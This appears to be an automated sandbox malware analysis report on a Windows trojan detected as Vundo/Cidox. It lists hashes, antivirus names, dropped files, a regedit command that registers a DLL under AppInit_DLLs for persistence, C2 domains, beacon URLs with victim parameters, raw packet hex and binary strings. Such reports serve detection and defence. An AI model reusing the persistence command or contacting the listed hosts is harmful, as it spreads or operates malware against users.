Analysis Date | 2014-10-31 16:14:12 |
---|---|
MD5 | 33a8f404432335d3564e071bf925ee1c |
SHA1 | ab93199b1576ece9b13efe2fb9a9cc8db555d76f |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: a9203a1cc01f9b0f484624acacfdc942 sha1: 6f41d4c06bd740cc857107a74c1592da3e5ccbf9 size: 91648 | |
Section | _ASM2 md5: 5cbdb671cc3cd9b028945704dfb18263 sha1: 2c7f4695add5826a76301516006fca2d6cf0a3f4 size: 63488 | |
Section | .rdata md5: 80759194640cd0c281898748a3c7253b sha1: dcb925370efdab1968bdce434442f7fbd7245c68 size: 8192 | |
Section | .data md5: 1695711b55e0545e6ce1f490e5461ba9 sha1: 23a499463667bfda6e2f52b56f4fa651be33479f size: 5120 | |
Section | .tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 | |
Section | .rsrc md5: c57f9dda23e74dc2dffbaa3c8425f4c6 sha1: b4ae49516f17224939910fb68e13bc1ba5f2c037 size: 34304 | |
Timestamp | 2012-09-25 02:26:21 | |
Version | LegalCopyright: © Корпорация Майкрософт. Все права защищены. InternalName: RSTRUI.EXE FileVersion: 5.1.2600.5512 (xpsp.080413-2108) CompanyName: Корпорация Майкрософт ProductName: Операционная система Microsoft® Windows® ProductVersion: 5.1.2600.5512 FileDescription: Приложение восстановления системы OriginalFilename: RSTRUI.EXE | |
Packer | Microsoft Visual C++ ?.? | |
PEhash | ed7168502630d6f765608bf68788c6f93aa2bee5 | |
IMPhash | 11c52178b812c23b7febf02fc8e99619 | |
AV | 360 Safe | Gen:Variant.Kazy.211341 |
AV | Ad-Aware | Gen:Variant.Kazy.211341 |
AV | Alwil (avast) | Vundo-XF [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Cidox.A.gen!Eldorado |
AV | Avira (antivir) | TR/Vundo.Gen7 |
AV | BullGuard | Gen:Variant.Kazy.211341 |
AV | CA (E-Trust Ino) | no_virus |
AV | CAT (quickheal) | Trojan.Vundo.Gen |
AV | ClamAV | Win.Trojan.Cidox-121 |
AV | Dr. Web | Trojan.Mayachok.17986 |
AV | Emsisoft | Gen:Variant.Kazy.211341 |
AV | Eset (nod32) | Win32/Kryptik.AMFU |
AV | Fortinet | W32/Citirevo.AB!tr |
AV | Frisk (f-prot) | W32/Cidox.A.gen!Eldorado |
AV | F-Secure | Gen:Variant.Kazy.211341 |
AV | Grisoft (avg) | Generic_r.BGN |
AV | Ikarus | Trojan-Downloader.Win32.Vundo |
AV | K7 | Backdoor ( 04c4f2bf1 ) |
AV | Kaspersky | Trojan.Win32.Generic |
AV | MalwareBytes | Trojan.FakeMS.ED |
AV | Mcafee | Vundo-FASV!33A8F4044323 |
AV | Microsoft Security Essentials | TrojanDropper:Win32/Vundo.V |
AV | MicroWorld (escan) | Gen:Variant.Kazy.211341 |
AV | Norman | Gen:Variant.Kazy.211341 |
AV | Rising | Trojan.Win32.Generic.1349AE9B |
AV | Sophos | Mal/Vundo-M |
AV | Symantec | Trojan.Zatvex!gen6 |
AV | Trend Micro | TROJ_VUNDO.SMKK |
AV | VirusBlokAda (vba32) | Backdoor.Cidox |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
---|---|
Creates File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini |
Deletes File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Process
↳ C:\WINDOWS\Explorer.EXE
Registry | HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL |
---|---|
Creates File | C:\WINDOWS\system32\dauaakj.dll |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Cookies\cf |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp |
Deletes File | C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Creates Process | C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg |
Winsock DNS | clickbeta.ru |
Winsock DNS | denadb.com |
Winsock DNS | 91.220.35.154 |
Winsock DNS | terrans.su |
Winsock DNS | tryatdns.com |
Winsock DNS | clickclans.ru |
Winsock DNS | denareclick.com |
Winsock DNS | fescheck.com |
Winsock DNS | instrango.com |
Winsock DNS | verzinla.com |
Winsock DNS | getintsu.com |
Winsock DNS | tegimode.com |
Winsock DNS | netrovad.com |
Winsock DNS | nshouse1.com |
Winsock DNS | veriolana.com |
Winsock DNS | inzavora.com |
Winsock DNS | odobvare.com |
Winsock DNS | foradns.com |
Winsock DNS | getavodes.com |
Winsock DNS | clickstano.com |
Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\dauaakj.dll\\x00 |
---|
Network Details:
DNS | getintsu.com Type: A 141.8.225.80 |
---|---|
DNS | getavodes.com Type: A 141.8.225.80 |
DNS | tryatdns.com Type: A 141.8.225.80 |
DNS | fescheck.com Type: A 209.222.14.3 |
DNS | inzavora.com Type: A 141.8.225.80 |
DNS | denadb.com Type: A 204.11.56.26 |
DNS | foradns.com Type: A 209.222.14.3 |
DNS | veriolana.com Type: A |
DNS | verzinla.com\032 Type: A |
DNS | instrango.com Type: A |
DNS | netrovad.com Type: A |
DNS | odobvare.com Type: A |
DNS | terrans.su Type: A |
DNS | tegimode.com Type: A |
DNS | clickstano.com Type: A |
DNS | denareclick.com Type: A |
DNS | clickbeta.ru Type: A |
DNS | nshouse1.com Type: A |
DNS | clickclans.ru Type: A |
HTTP GET | http://getintsu.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU User-Agent: |
HTTP GET | http://getavodes.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUX3J49FLC6Zz User-Agent: |
HTTP GET | http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURz7+qiRh4pJ User-Agent: |
HTTP GET | http://fescheck.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxURRF51nwD1/z User-Agent: |
HTTP GET | http://inzavora.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUfDCwx835jSU User-Agent: |
HTTP GET | http://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUeY4cMHbVW5i User-Agent: |
HTTP GET | http://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUQ0bnSPKR2xz User-Agent: |
HTTP GET | http://91.220.35.154/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3440&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygwguwbTpqnrfD+6H0jtQwZJ5t4+bN9UxUZy5Ea2PjIuA User-Agent: |
Flows TCP | 192.168.1.1:1031 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1032 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1033 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1034 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 204.11.56.26:80 |
Flows TCP | 192.168.1.1:1037 ➝ 209.222.14.3:80 |
Flows TCP | 192.168.1.1:1038 ➝ 91.220.35.154:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785566 44437778 3833356a 53552048 UxUfDCwx835jSU H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2067 TTP/1.1..Host: g 0x000000e0 (00224) 6574696e 7473752e 636f6d0d 0a0d0a etintsu.com.... 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785558 334a3439 464c4336 5a7a2048 UxUX3J49FLC6Zz H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2067 TTP/1.1..Host: g 0x000000e0 (00224) 65746176 6f646573 2e636f6d 0d0a0d0a etavodes.com.... 0x000000f0 (00240) 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785552 7a372b71 69526834 704a2048 UxURz7+qiRh4pJ H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2074 TTP/1.1..Host: t 0x000000e0 (00224) 72796174 646e732e 636f6d0d 0a0d0a0a ryatdns.com..... 0x000000f0 (00240) 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785552 52463531 6e774431 2f7a2048 UxURRF51nwD1/z H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2066 TTP/1.1..Host: f 0x000000e0 (00224) 65736368 65636b2e 636f6d0d 0a0d0a0a escheck.com..... 0x000000f0 (00240) 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785566 44437778 3833356a 53552048 UxUfDCwx835jSU H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2069 TTP/1.1..Host: i 0x000000e0 (00224) 6e7a6176 6f72612e 636f6d0d 0a0d0a0a nzavora.com..... 0x000000f0 (00240) 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785565 5934634d 48625657 35692048 UxUeY4cMHbVW5i H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2064 TTP/1.1..Host: d 0x000000e0 (00224) 656e6164 622e636f 6d0d0a0d 0a0d0a0a enadb.com....... 0x000000f0 (00240) 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 55785551 30626e53 504b5232 787a2048 UxUQ0bnSPKR2xz H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2066 TTP/1.1..Host: f 0x000000e0 (00224) 6f726164 6e732e63 6f6d0d0a 0d0a0a0a oradns.com...... 0x000000f0 (00240) 0x00000000 (00000) 47455420 2f706870 62622f67 65742e70 GET /phpbb/get.p 0x00000010 (00016) 68703f69 643d4330 35393930 30414541 hp?id=C059900AEA 0x00000020 (00032) 37354530 36465858 58585858 58585858 75E06FXXXXXXXXXX 0x00000030 (00048) 58583030 3030266b 65793d33 34343026 XX0000&key=3440& 0x00000040 (00064) 61763d30 26766d3d 3026616c 3d302670 av=0&vm=0&al=0&p 0x00000050 (00080) 3d323931 266f733d 352e312e 32363030 =291&os=5.1.2600 0x00000060 (00096) 2e33267a 3d343538 26686173 683d4376 .3&z=458&hash=Cv 0x00000070 (00112) 436e426a 566a3849 4f4d3333 41394c66 CnBjVj8IOM33A9Lf 0x00000080 (00128) 4f476442 6b6e6a79 3961577a 414a4645 OGdBknjy9aWzAJFE 0x00000090 (00144) 384a7837 72487455 5437765a 36317a67 8Jx7rHtUT7vZ61zg 0x000000a0 (00160) 57796777 67757762 5470716e 7266442b WygwguwbTpqnrfD+ 0x000000b0 (00176) 3648306a 7451775a 4a357434 2b624e39 6H0jtQwZJ5t4+bN9 0x000000c0 (00192) 5578555a 79354561 32506a49 75412048 UxUZy5Ea2PjIuA H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a2039 TTP/1.1..Host: 9 0x000000e0 (00224) 312e3232 302e3335 2e313534 0d0a0d0a 1.220.35.154.... 0x000000f0 (00240)
Strings
P. . .3..w .jyY}..uriVttcetorla \ .CC .N. . E uri 041904B0 1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee 1Display debugger and debuggee version information 333f3 5.1.2600.5512 5.1.2600.5512 (xpsp.080413-2108) 7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information 8Configure mapping from file extension to source language About WinDbg Activate window Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows Close all source windows-Close all windows that are error placeholders"Open a new docked window container CompanyName CWindowClass Debug operations Detach the current program Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier Dock all undocked windows f3fff FileDescription FileVersion H ((((( H Halt the current program Help contents and searches h(((( H InternalName KERNEL32.DLL Kernel debugging control.Cycle through the available baud rate settings LegalCopyright Manage event filters Manage open windows :Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available Microsoft mscoree.dll Open a command browser window Open the command window Open the disassembly window Open the help index Open the help search dialog Open the help table of contents)Open the help for the current window type)Open help for the currently selected text "Open the process and thread window Open the registers window Open the scratch pad window"Open the process and thread window OriginalFilename ProductName ProductVersion Restart the Program"Stop debugging the current program RSTRUI.EXE Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running Step over the next statement Step out of the current function1Run the program to the line containing the cursor StringFileInfo Toggle the status bar on or off Toggle the status bar on or off,View or edit the font for the current window Toggle the toolbar on or off Trace into the next statement Translation Undock all docked windows VarFileInfo View program options View the module list View WinDbg's command line VS_VERSION_INFO Window arrangement and selection Windows {,0.+0q !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~ 0A@@Ju 0SSSSS 0trueM 1.CQx(1 1eX&.& 1@]z1 \ 2DU}|r "2`EtV 2hcF6n 2nrst] $#)39W 3aotsg 3DJTZ,sTZ 3[Heef} 3u'xI# 3UYjVff 4:(3|? 43DqG/ 4`8R8su 5(g'S| .5ps25 5RoX0{j 6bWnga k 6BXpteS 6;jkvgfkJ{ ^!))6z 7WnyuZ 7zO}qk 8;7780 )`@8@8 8EEMM< 8EHUXQ &8LkQL ]@]8oE[ a>18R0 a,2<B_ 'A5:TQ abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ ADVAPI32.dll ADVAPI32.DLL AdviseInUserModeA aIvNZR AkgM n An application has made an attempt to load the C runtime library incorrectly. >anqybnq~ =APAWG /apral `_ASM2 - Attempt to initialize the CRT more than once. - Attempt to use MSIL code from this assembly during native code initialization August aVGq4b AWhk>h BeginPaint b`jVMUj \BLR?a bp@FoA bQrV% bRUQZK( bXeud} C@ @ 7s@ @ cb"cpm CcoWoG ChBRjs ci7$CISY CIFQlSlR~ c$L@M0 CloseHandle CorExitProcess CoTaskMemAlloc CreateBitmap CreateSolidBrush CreateWindowExA - CRT not initialized @.data DateTime:%04d.%02d:%d DDDDDC DDDDDDDDDD dddd, MMMM dd, yyyy December DecodePointer DeleteCriticalSection DestroyWindow deu3lhIi,Mr) DeviceIoControl ^df*j" Di6yGW DispatchMessageA DOMAIN error DrawTextA DTeiej Dv)UArSay D |x>)ZW E2hJeelsP eegt4) eFa!"4% eiJ!6= eile~r em1Ub[ EncodePointer EndPaint EnterCriticalSection {eoao^ err3w)trr0o ExitProcess February fek?{M FindResourceA - floating point support not loaded FlsAlloc FlsFree FlsGetValue FlsSetValue FreeEnvironmentStringsA FreeEnvironmentStringsW Friday f!V_v1 gC GDI32.dll GetACP GetActiveWindow GetClientRect GetCommandLineA GetCPInfo GetCurrentProcess GetCurrentProcessId GetCurrentThreadId GetDeviceCaps GetEnvironmentStrings GetEnvironmentStringsW GetFileType GetLastActivePopup GetLastError GetLocaleInfoA GetMessageA GetModuleFileNameA GetModuleHandleA GetModuleHandleW GetOEMCP GetProcAddress GetProcessWindowStation GetStartupInfoA GetStdHandle GetStringTypeA GetStringTypeW GetSystemMetrics GetSystemTimeAsFileTime GetTickCount GetUserObjectInformationA GetVersion G@jji' gnrp)v GpKFsq <]|GQn \ g[V'1' h9,B,B4 HeapAlloc HeapCreate HeapFree HeapReAlloc HeapSize heF1.ttloM hF`Y>. HH:mm:ss hrpYg2[. hsXBBhB] _Hu2,R h wnKg HX HY>O[* :I2~pn- +i5&n.LA1 IDDu"c{h! i isb] IL"YWii InitializeCriticalSectionAndSpinCount InterlockedDecrement InterlockedIncrement IsDebuggerPresent IsValidCodePage ItrmGOv iWfm72ei +J3G/t JanFebMarAprMayJunJulAugSepOctNovDec January JavaStudioClass jBk1PY jCos $#eLiai j@Eh@h j@j ^V (,JW6h" KERNEL32.dll K;|euF @kGZn]~ k|oNZ h L /0?t l4g2q&k L}69c%c> lBSEaY Lc0Zzon LCMapStringA LCMapStringW LeA2dM LeaveCriticalSection ?(LEj9 lFlF0j lGplru LoadAcceleratorsA LoadCursorA LoadIconA LoadIconW LoadLibraryA LoadResource LoadStringA LockResource lstrcmpiA mdAyd, MessageBoxA Microsoft Visual C++ Runtime Library MM/dd/yy Monday MS]c5Z}tna{<t MultiByteToWideChar M<X&$W n"@!@! ~ N ' N/0o N!1o'5 n9t<H% nes%dc nevpXqB nng9 lanrgS0 - not enough space for arguments - not enough space for environment - not enough space for locale information - not enough space for lowio initialization - not enough space for _onexit/atexit table - not enough space for stdio initialization - not enough space for thread data November ^npduK NVPV<=( Nyntc$[CD o2lp=Lroeeq0bLLb October o,Er)oa ole32.dll ~}ollr) o^L%\T OngBeVso *oo| f OstDQiotLX3lee ot~#ilslafl Ouuuu@ $'"!P&Dv Pf ltlRGi >__ PiA$T Please contact the application's support team for more information. pMcj8JuD PPPPPPPP Program: <program name unknown> =P_]tE - pure virtual function call (PV`f> '*PyGJWZ q'<BKe qeaEca Q_\|pq qQ[=^c QueryPerformanceCounter [r:}^} r2U/LP R4#{HTj >!rant rAtetYE.H `.rdata rea5p.0215 Rectangle RegConnectRegistryA RegisterClassExA reny-/ rIsmC{t rMCR)Ngexe?* rrdr~zoee |@@rt@ RtlUnwind rTor(]eieK runtime error Runtime Error! s5rs\EC0io Saturday scm32.dll September SetFilePointer SetHandleCount SetLastError SetParent SetUnhandledExceptionFilter S$/H?D3T_ ShowWindow SING error @ skyHJocnaQ :]SlG^ snelvLbvsllYIoae} ^soda$ ~SQtg9 S$R4Q% strcat Sunday SunMonTueWedThuFriSat SX),FE s;ZiKd ==taju] tAOitYDtHoyHo TerminateProcess TextOutA This application has requested the Runtime to terminate it in an unusual way. This indicates a bug in your application. This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. !This program cannot be run in DOS mode. Thursday tiiin|eP9i < tK< tG TLOSS error TlsAlloc TlsFree TlsGetValue TlsSetValue tluNi_ tlWttPFs tMaT/L TranslateAcceleratorA TranslateMessage TrC1i{ t"SS9] t$<"u 3 Tuesday ;t$,v- Tvh@:$ tv mkw*=EoPg t+WWVPV tx0bgF t}(yiCF :U 0K`c %_uag@Wk uAnl?LgV0l^wGcP UEngGu UE}u%3j u`j^mkE u-|ltdo ULX6^+ - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter UN=I0|d UpdateWindow UQPXY]Y[ URPQQh USER32.dll USER32.DLL UW('=u ;U[x=$% Vihnu0 VirtualAlloc VirtualFree vM6=1% v N+D$ `vtvd!' ;vu]hF W24Yu7 |"w 5Hi^ wB5Gz\ Wednesday WideCharToMultiByte WriteFile `WsniW wsprintfA wtDDDDDDDC Wt j~^ Wu ^xz wwwws0 wwwwwwws wwwwwwww? wwwwwwwws wwwwwwwwww wwwwwwwwwwwww wwwwwwwwwwwwww wwwwwwwwwwwwwwz wwwwwwwwwwwwwz wwwwwwwwwwwwwzwwww wwwwwwwwzww wwwwwwwxx wwwwwwwz wwwwwwwzww WXcI)Sz^u W_X|dsN Wye_'@l W` Z58 ]X{__'2}<l X5;EKV x68MUu5 x9FPYgL@ X:AiGu -xeany _XP)\j x^`Rz( x!u(Q}+[NZ y5>I4~ y /a ^ ="YATy 